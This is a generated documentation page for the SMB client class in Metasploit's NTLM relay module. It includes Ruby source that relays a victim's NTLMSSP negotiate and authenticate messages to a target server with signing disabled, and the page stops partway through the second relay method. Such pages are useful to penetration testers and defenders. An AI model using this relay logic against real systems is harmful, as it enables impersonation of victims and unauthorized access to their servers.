
<!DOCTYPE html>
<html>
<head>
  <!-- Document metadata for the YARD-generated page of the SMB relay client class. -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>
    Class: Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client
    &mdash; Documentation by YARD 0.9.37
  </title>
  <link rel="stylesheet" href="../../../../../../../css/style.css">
  <link rel="stylesheet" href="../../../../../../../css/common.css">
  <!-- Page-level globals: the documented object's path and the relative path to the documentation root (presumably consumed by js/app.js). -->
  <script>
    pathId = "Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client";
    relpath = '../../../../../../../';
  </script>
  <script src="../../../../../../../js/jquery.js"></script>
  <script src="../../../../../../../js/app.js"></script>
</head>
<body>
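<div class="nav_wrap">
<!-- Side panel embedding the class list; the title attribute gives the frame an accessible name for assistive technology. -->
<iframe id="nav" src="../../../../../../../class_list.html?1" title="Class list"></iframe>
<div id="resizer"></div>
</div>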
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../../../_index.html">Index (C)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span> &raquo; <span class='title'>NTLM</span> &raquo; <span class='title'>Target</span> &raquo; <span class='title'><span class='object_link'><a href="../SMB.html" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB (module)">SMB</a></span></span>
&raquo;
<span class="title">Client</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../../../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName">RubySMB::Client</span>
<ul class="fullTree">
<li>Object</li>
<li class="next">RubySMB::Client</li>
<li class="next">Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>The SMB client used to interact with the relay target, i.e. the SMB server to which the relayed NTLM authentication messages are forwarded.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="SUPPORTED_CLIENT_DIALECTS-constant" class="">SUPPORTED_CLIENT_DIALECTS =
<div class="docstring">
<div class="discussion">
<p>The SMB dialects supported when this client negotiates with the target server (SMB 2.0.2 through SMB 3.0.2). SMB 1 is not supported: <a href="https://github.com/rapid7/metasploit-framework/issues/16261">github.com/rapid7/metasploit-framework/issues/16261</a>. Note that similar dialect lists exist for both the relay server and the relay clients: SMB::Relay::NTLM::SUPPORTED_SERVER_DIALECTS and <span class='object_link'><a href="#SUPPORTED_CLIENT_DIALECTS-constant" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS (constant)">SUPPORTED_CLIENT_DIALECTS</a></span>.</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbracket'>[</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0202</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0210</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0300</span><span class='comma'>,</span>
<span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Client</span><span class='op'>::</span><span class='const'>SMB2_DIALECT_0302</span><span class='comma'>,</span>
<span class='rbracket'>]</span></pre></dd>
</dl>
<h2>Instance Attribute Summary <small><a href="#" class="summary_toggle">collapse</a></small></h2>
<ul class="summary">
<li class="protected ">
<span class="summary_signature">
<a href="#logger-instance_method" title="#logger (instance method)">#<strong>logger</strong> &#x21d2; Object </a>
</span>
<span class="note title readonly">readonly</span>
<span class="note title protected">protected</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute logger.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#target-instance_method" title="#target (instance method)">#<strong>target</strong> &#x21d2; Object </a>
</span>
<span class="note title readonly">readonly</span>
<span class="summary_desc"><div class='inline'>
<p>Returns the value of attribute target.</p>
</div></span>
</li>
</ul>
<h2>
Class Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#create-class_method" title="create (class method)">.<strong>create</strong>(provider, target, logger, timeout) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#add_smb3_to_negotiate_request-instance_method" title="#add_smb3_to_negotiate_request (instance method)">#<strong>add_smb3_to_negotiate_request</strong>(packet, _dialects = []) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(dispatcher, username:, password:, domain: nil, local_workstation: nil, always_encrypt: nil, ntlm_flags: nil, provider: nil, target: nil, logger: nil) &#x21d2; Client </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>A new instance of Client.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#normalize_type3_encoding-instance_method" title="#normalize_type3_encoding (instance method)">#<strong>normalize_type3_encoding</strong>(type3_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp_type1-instance_method" title="#relay_ntlmssp_type1 (instance method)">#<strong>relay_ntlmssp_type1</strong>(client_type1_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp_type3-instance_method" title="#relay_ntlmssp_type3 (instance method)">#<strong>relay_ntlmssp_type3</strong>(client_type3_msg) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
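<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(dispatcher, username:, password:, domain: nil, local_workstation: nil, always_encrypt: nil, ntlm_flags: nil, provider: nil, target: nil, logger: nil) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client (class)">Client</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a new instance of Client. The parent <code>RubySMB::Client</code> constructor is always called with <code>smb1: false</code>, <code>smb2: true</code> and <code>smb3: true</code>; the remaining credential and NTLM options are passed through unchanged. The relay-specific <code>logger</code>, <code>provider</code> and <code>target</code> are stored on the instance.</p>
</div>
</div>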
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 18</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span> <span class='label'>username:</span><span class='comma'>,</span> <span class='label'>password:</span><span class='comma'>,</span> <span class='label'>domain:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>local_workstation:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>always_encrypt:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>ntlm_flags:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>provider:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>target:</span> <span class='kw'>nil</span><span class='comma'>,</span> <span class='label'>logger:</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span>
<span class='label'>smb1:</span> <span class='kw'>false</span><span class='comma'>,</span>
<span class='label'>smb2:</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='label'>smb3:</span> <span class='kw'>true</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='id identifier rubyid_username'>username</span><span class='comma'>,</span>
<span class='label'>password:</span> <span class='id identifier rubyid_password'>password</span><span class='comma'>,</span>
<span class='label'>domain:</span> <span class='id identifier rubyid_domain'>domain</span><span class='comma'>,</span>
<span class='label'>local_workstation:</span> <span class='id identifier rubyid_local_workstation'>local_workstation</span><span class='comma'>,</span>
<span class='label'>always_encrypt:</span> <span class='id identifier rubyid_always_encrypt'>always_encrypt</span><span class='comma'>,</span>
<span class='label'>ntlm_flags:</span> <span class='id identifier rubyid_ntlm_flags'>ntlm_flags</span><span class='rparen'>)</span>
<span class='ivar'>@logger</span> <span class='op'>=</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@provider</span> <span class='op'>=</span> <span class='id identifier rubyid_provider'>provider</span>
<span class='ivar'>@target</span> <span class='op'>=</span> <span class='id identifier rubyid_target'>target</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_attr_details" class="attr_details">
<h2>Instance Attribute Details</h2>
<span id=""></span>
<div class="method_details first">
<h3 class="signature first" id="logger-instance_method">
#<strong>logger</strong> &#x21d2; <tt>Object</tt> <span class="extras">(readonly, protected)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute logger.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
162
163
164</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 162</span>
<span class='kw'>def</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='ivar'>@logger</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<span id=""></span>
<div class="method_details ">
<h3 class="signature " id="target-instance_method">
#<strong>target</strong> &#x21d2; <tt>Object</tt> <span class="extras">(readonly)</span>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the value of attribute target.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
16
17
18</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 16</span>
<span class='kw'>def</span> <span class='id identifier rubyid_target'>target</span>
<span class='ivar'>@target</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="class_method_details" class="method_details_list">
<h2>Class Method Details</h2>
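<div class="method_details first">
<h3 class="signature first" id="create-class_method">
.<strong>create</strong>(provider, target, logger, timeout) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Opens a TCP connection to <code>target.ip</code> / <code>target.port</code> with the given timeout, wraps the socket in a <code>RubySMB::Dispatcher::Socket</code> and returns a new Client for that target. The client is created with an empty username and password and with <code>always_encrypt: false</code>; the NTLM messages themselves are supplied later through <code>relay_ntlmssp_type1</code> and <code>relay_ntlmssp_type3</code>.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 35</span>
<span class='kw'>def</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='id identifier rubyid_provider'>provider</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='id identifier rubyid_sock'>sock</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Socket</span><span class='op'>::</span><span class='const'>Tcp</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PeerHost</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PeerPort</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_port'>port</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Timeout</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Context</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Caller</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_provider'>provider</span>
<span class='rbrace'>}</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_dispatcher'>dispatcher</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Dispatcher</span><span class='op'>::</span><span class='const'>Socket</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_sock'>sock</span><span class='rparen'>)</span>
<span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span>
<span class='label'>provider:</span> <span class='id identifier rubyid_provider'>provider</span><span class='comma'>,</span>
<span class='label'>username:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>password:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='label'>target:</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span>
<span class='label'>always_encrypt:</span> <span class='kw'>false</span><span class='comma'>,</span>
<span class='label'>logger:</span> <span class='id identifier rubyid_logger'>logger</span>
<span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>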
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
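<div class="method_details first">
<h3 class="signature first" id="add_smb3_to_negotiate_request-instance_method">
#<strong>add_smb3_to_negotiate_request</strong>(packet, _dialects = []) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Calls the parent implementation with <code>SUPPORTED_CLIENT_DIALECTS</code> in place of the caller's dialect list, so the negotiate request always carries this class's fixed set of dialects. The <code>_dialects</code> argument is ignored.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
57
58
59</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 57</span>
<span class='kw'>def</span> <span class='id identifier rubyid_add_smb3_to_negotiate_request'>add_smb3_to_negotiate_request</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='comma'>,</span> <span class='id identifier rubyid__dialects'>_dialects</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="#SUPPORTED_CLIENT_DIALECTS-constant" title="Msf::Exploit::Remote::Relay::NTLM::Target::SMB::Client::SUPPORTED_CLIENT_DIALECTS (constant)">SUPPORTED_CLIENT_DIALECTS</a></span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>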
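<div class="method_details ">
<h3 class="signature " id="normalize_type3_encoding-instance_method">
#<strong>normalize_type3_encoding</strong>(type3_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Calls <code>force_encoding("ASCII-8BIT")</code> on the value of every security buffer in <code>type3_msg</code>, which re-labels each string as binary in place without changing its bytes.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
154
155
156</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 154</span>
<span class='kw'>def</span> <span class='id identifier rubyid_normalize_type3_encoding'>normalize_type3_encoding</span><span class='lparen'>(</span><span class='id identifier rubyid_type3_msg'>type3_msg</span><span class='rparen'>)</span>
<span class='id identifier rubyid_type3_msg'>type3_msg</span><span class='period'>.</span><span class='id identifier rubyid_security_buffers'>security_buffers</span><span class='period'>.</span><span class='id identifier rubyid_map!'>map!</span><span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid__buffer_name'>_buffer_name</span><span class='comma'>,</span> <span class='id identifier rubyid_security_buffer'>security_buffer</span><span class='op'>|</span> <span class='id identifier rubyid_security_buffer'>security_buffer</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>ASCII-8BIT</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>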
<div class="method_details ">
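<h3 class="signature " id="relay_ntlmssp_type1-instance_method">
#<strong>relay_ntlmssp_type1</strong>(client_type1_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Negotiates with the target, then places the client's NTLMSSP type 1 (negotiate) message into the security buffer of an SMB2 NTLMSSP negotiate packet and sends it with <code>signing_enabled</code> set to 0. The session id from the target's reply is stored for the later type 3 exchange, and the target's type 2 (challenge) message is returned in a <code>RelayResult</code> with status <code>STATUS_MORE_PROCESSING_REQUIRED</code>. If any exception is raised, the failure is logged and <code>nil</code> is returned. The SMB1 branch is an unimplemented TODO.</p>
<p>Enforcing SMB signing on servers is the usual mitigation for NTLM relay to SMB.</p>
</div>
</div>
<!-- NOTE(review): SUPPORTED_CLIENT_DIALECTS as shown on this page stops at SMB2_DIALECT_0302, so the '0x0311' pre-auth hash branch in the listing below looks unreachable unless the dialect is set elsewhere; confirm against RubySMB. -->
<!-- NOTE(review): the listing rescues ::Exception, which also catches non-StandardError exceptions such as Interrupt; rescuing StandardError is the usual choice. -->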
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>client_type1_msg</span>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 63</span>
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp_type1'>relay_ntlmssp_type1</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type1_msg'>client_type1_msg</span><span class='rparen'>)</span>
<span class='ivar'>@version</span> <span class='op'>=</span> <span class='id identifier rubyid_negotiate'>negotiate</span>
<span class='kw'>if</span> <span class='ivar'>@version</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB1</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># TODO: SMB1 not supported
</span> <span class='comment'># neg_pkt = smb1_ntlmssp_negotiate_packet
</span> <span class='comment'># neg_pkt.set_ntlm_type1_blob(victim_type1_msg.serialize)
</span> <span class='comment'># resp = send_recv(neg_pkt)
</span> <span class='comment'>#
</span> <span class='comment'># challenge_packet = smb1_ntlmssp_challenge_packet(resp)
</span> <span class='comment'>#
</span> <span class='comment'># # Store the available OS information before going forward.
</span> <span class='comment'># @peer_native_os = challenge_packet.data_block.native_os.to_s
</span> <span class='comment'># @peer_native_lm = challenge_packet.data_block.native_lan_man.to_s
</span> <span class='comment'>#
</span> <span class='comment'># @user_id = challenge_packet.smb_header.uid
</span> <span class='comment'>#
</span> <span class='comment'># type2_message_encoded = smb1_type2_message(challenge_packet)
</span> <span class='comment'>#
</span> <span class='comment'># type2_challenge = Net::NTLM::Message.decode64(type2_message_encoded)
</span> <span class='comment'>#
</span> <span class='comment'># type2_challenge.challenge
</span> <span class='kw'>else</span>
<span class='comment'># Same as the ::RubySMB::Client::Authentication smb2_authenticate method, with two differences
</span> <span class='comment'># - changes the type1_blob to match the blob of the type1 messages received from the client
</span> <span class='comment'># - returns the challenge messages received from the server
</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_negotiate_packet'>smb2_ntlmssp_negotiate_packet</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='period'>.</span><span class='id identifier rubyid_set_security_buffer'>set_security_buffer</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type1_msg'>client_type1_msg</span><span class='rparen'>)</span>
<span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_enabled'>signing_enabled</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_server_type2_pkt_raw'>server_type2_pkt_raw</span> <span class='op'>=</span> <span class='id identifier rubyid_send_recv'>send_recv</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type1_pkt'>server_type1_pkt</span><span class='rparen'>)</span>
<span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_challenge_packet'>smb2_ntlmssp_challenge_packet</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt_raw'>server_type2_pkt_raw</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='ivar'>@session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span>
<span class='id identifier rubyid_type2_ntlm_message'>type2_ntlm_message</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_type2_message'>smb2_type2_message</span><span class='lparen'>(</span><span class='id identifier rubyid_server_type2_pkt'>server_type2_pkt</span><span class='rparen'>)</span>
<span class='const'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>RelayResult</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='label'>message:</span> <span class='const'>Net</span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Message</span><span class='period'>.</span><span class='id identifier rubyid_decode64'>decode64</span><span class='lparen'>(</span><span class='id identifier rubyid_type2_ntlm_message'>type2_ntlm_message</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='label'>nt_status:</span> <span class='const'><span class='object_link'><a href="../../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to retrieve server challenge from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
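<h3 class="signature " id="relay_ntlmssp_type3-instance_method">
#<strong>relay_ntlmssp_type3</strong>(client_type3_msg) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Places the client's NTLMSSP type 3 (authenticate) message into the security buffer of an SMB2 <code>SessionSetupRequest</code> that reuses the session id stored by <code>relay_ntlmssp_type1</code>, and sends it with <code>signing_enabled</code> set to 0. The response is parsed with <code>smb2_ntlmssp_final_packet</code>, <code>@session_encrypt_data</code> is set when SMB3 is enabled and the response's session flags have <code>encrypt_data</code> set, and a <code>RelayResult</code> is then built. The SMB1 branch is an unimplemented TODO.</p>
</div>
</div>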
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>client_type3_msg</span>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/relay/ntlm/target/smb/client.rb', line 117</span>
<!-- relay_ntlmssp_type3: wraps the NTLMSSP type 3 message passed in as client_type3_msg in an SMB2 SessionSetupRequest, sends it on the session identified by @session_id, and returns a RelayResult carrying the NT status from the target's reply. Evaluates to nil on the SMB1 path and whenever an exception is rescued. -->
<span class='kw'>def</span> <span class='id identifier rubyid_relay_ntlmssp_type3'>relay_ntlmssp_type3</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type3_msg'>client_type3_msg</span><span class='rparen'>)</span>
<!-- NOTE(review): the SMB1 branch has no body, so the method evaluates to nil here without logging anything; callers cannot tell this apart from the nil returned by the rescue clause at the end of the method. -->
<span class='kw'>if</span> <span class='ivar'>@version</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SMB1</span><span class='tstring_end'>&#39;</span></span>
<span class='comment'># TODO: SMB1 not supported
</span> <span class='kw'>else</span>
<span class='id identifier rubyid_packet'>packet</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>SessionSetupRequest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='ivar'>@session_id</span>
